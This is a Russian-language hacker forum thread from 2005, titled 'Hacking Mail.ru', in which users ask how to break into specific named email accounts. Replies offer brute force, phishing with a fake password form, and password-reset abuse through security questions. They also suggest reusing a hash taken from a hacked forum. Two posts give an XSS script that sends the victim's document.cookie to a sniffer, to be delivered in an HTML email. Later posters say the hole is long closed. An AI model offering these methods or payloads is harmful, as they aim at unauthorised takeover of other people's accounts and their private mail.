ВЗЛОМ Mail.ru

Discussion in 'Уязвимости Mail-сервисов' started by azeri_hacker, 24 Jun 2005.

  1. azeri_hacker

    azeri_hacker New Member

    Joined:
    2 Mar 2005
    Messages:
    16
    Likes Received:
    0
    Reputations:
    0
    привет
    допустим я хочу взломат testtestmail@mail.ru
    что я должен писат в писме для жертвы
    чтоб cookie писались /sniff/log
    THANK
     
  2. DR@G

    DR@G Banned

    Joined:
    26 Apr 2005
    Messages:
    16
    Likes Received:
    0
    Reputations:
    0
    что не пиши все равно эта фишка там не прокатит, будет только показан номер мессаги которую он читает
     
  3. Zadoxlik

    Zadoxlik рояль с сыром

    Joined:
    28 Feb 2005
    Messages:
    758
    Likes Received:
    216
    Reputations:
    257
    Брутом или СИ.
     
  4. kolok8

    kolok8 New Member

    Joined:
    3 Jul 2005
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    Помогите пожалуйста получить пароль от flirtation@mail.ru
    пробовал БРУТОМ, ничего не выходит, какой то заумный пасс придумал.
     
  5. Zadoxlik

    Zadoxlik рояль с сыром

    Joined:
    28 Feb 2005
    Messages:
    758
    Likes Received:
    216
    Reputations:
    257
    Если чел ламоват - СИ. Или посимвольный брут с разделением труда на нескока серверов =)
     
  6. DR@G

    DR@G Banned

    Joined:
    26 Apr 2005
    Messages:
    16
    Likes Received:
    0
    Reputations:
    0
    Если чувак лол, попробуй ему послать форму подтверждения пароля =)))
     
  7. dinar_007

    dinar_007 Мадемуазель

    Joined:
    18 Jan 2005
    Messages:
    1,019
    Likes Received:
    770
    Reputations:
    97
    Пошли ему письмо в ХТМЛ формате со скриптом для кражи куки)))
    Нужно... чтобы это письмо открыли в хтмл формате)))

    Вот скрипт:

    Code:
    <script>img=new Image(); img.src='Адресс сниффера...вернее его описание'+document.cookie;</script>

    Если ты украдёшь куки... то ты не сможешь изменить пароль и т.д.!!!
    Ты просто сможешь лазить в его почте и по другим ресурсам майл.ру под его ящиком (чат.майл.ру, фото.майл.ру и т.д. и т.п.)

    Но это ненадолго(((
     
    #7 dinar_007, 4 Jul 2005
    Last edited: 5 Jul 2005
  8. DR@G

    DR@G Banned

    Joined:
    26 Apr 2005
    Messages:
    16
    Likes Received:
    0
    Reputations:
    0
    неа, не прокатывает...
     
  9. m0nzt3r

    m0nzt3r моня

    Joined:
    22 Jun 2004
    Messages:
    2,091
    Likes Received:
    671
    Reputations:
    591
    >>Пошли ему письмо в ХТМЛ формате со скриптом для кражи куки))) (Соц. инженерия)
    а кто сказал что этот способ соц. инженерия???
    >>Нужно... чтобы это письмо открыли в хтмл формате)))
    Обязательно то что надо ПОСЛАТЬ письмо в хтмл формате
     
  10. dinar_007

    dinar_007 Мадемуазель

    Joined:
    18 Jan 2005
    Messages:
    1,019
    Likes Received:
    770
    Reputations:
    97
    Не прокатывает? Может это письмо ещё не открыли?
    Вот пример скрипта на античатовском сниффере

    Code:
    <script>img=new Image(); img.src='/cgi-bin/s.jpg'+document.cookie;</script>

    Попробуй
     
  11. DR@G

    DR@G Banned

    Joined:
    26 Apr 2005
    Messages:
    16
    Likes Received:
    0
    Reputations:
    0
    когда открывают письмо - то на сниффере вообще пусто... даже не отображается ничего ка-будто ничего и не открывали...
    Письмо ввиде хтмл посылал...
     
  12. dinar_007

    dinar_007 Мадемуазель

    Joined:
    18 Jan 2005
    Messages:
    1,019
    Likes Received:
    770
    Reputations:
    97
    А они его через веб интерфейс открывают???

    Может быть это письмо отправлене не в хтмл формате???
     
  13. dinar_007

    dinar_007 Мадемуазель

    Joined:
    18 Jan 2005
    Messages:
    1,019
    Likes Received:
    770
    Reputations:
    97
    Скажи пожалуйста...
    Когда письмо на тот ящик пришло скрипт видно было?
    Если было видно... то скорее всего майл.ру эту дырку закрыла (((
    Но это прокатит на других серваках )))
     
  14. Майор

    Майор Active Member

    Joined:
    24 Oct 2004
    Messages:
    557
    Likes Received:
    111
    Reputations:
    146
    естественно эти скрипты фильтруются системой, пошлите это сами себе и посмотрите во что превратился код письма =)
     
  15. m0nzt3r

    m0nzt3r моня

    Joined:
    22 Jun 2004
    Messages:
    2,091
    Likes Received:
    671
    Reputations:
    591
    Динар этот хсс уже давно закрыт!!какой ты наивный))))
     
  16. dinar_007

    dinar_007 Мадемуазель

    Joined:
    18 Jan 2005
    Messages:
    1,019
    Likes Received:
    770
    Reputations:
    97
    Наивный?
    Я просто давно не пробовал... Думал, что всё ещё работает(((
     
  17. DR@G

    DR@G Banned

    Joined:
    26 Apr 2005
    Messages:
    16
    Likes Received:
    0
    Reputations:
    0
    письмо открыли 100%
     
  18. bul666

    bul666 Banned

    Joined:
    21 Apr 2005
    Messages:
    285
    Likes Received:
    8
    Reputations:
    -1
    Набери в поисковике нужный имаил... Быть может он зарегился на каком нить тупом форуме, который легко взламывается... (phpBB или другой) Сломай... Потом возьми его hash пороля (Быть может он указал пороль на форуме, такой же как и на мыле)... Расштфруй и все )))
     
  19. dinar_007

    dinar_007 Мадемуазель

    Joined:
    18 Jan 2005
    Messages:
    1,019
    Likes Received:
    770
    Reputations:
    97
    А вот у меня мыло сломали сегодня (((
    Обидно (((
     
  20. DowX

    DowX New Member

    Joined:
    1 Mar 2005
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    что за времена, до сих пор надеються на перебор паролей.

    узнай у того чувака или чувихи какое у него или у нее любимое блюдо.
    если ты с ним знаком думаю для тебя это не составит труда.
    как узнаешь что за жрачку он любит иди вот по этой ссылке
    http://win.mail.ru/cgi-bin/passremind

    думаю дальше разберешься.....

    эээхххх кто бы мне вот так объяснял бы=), в свое время...да и ша не помешало бы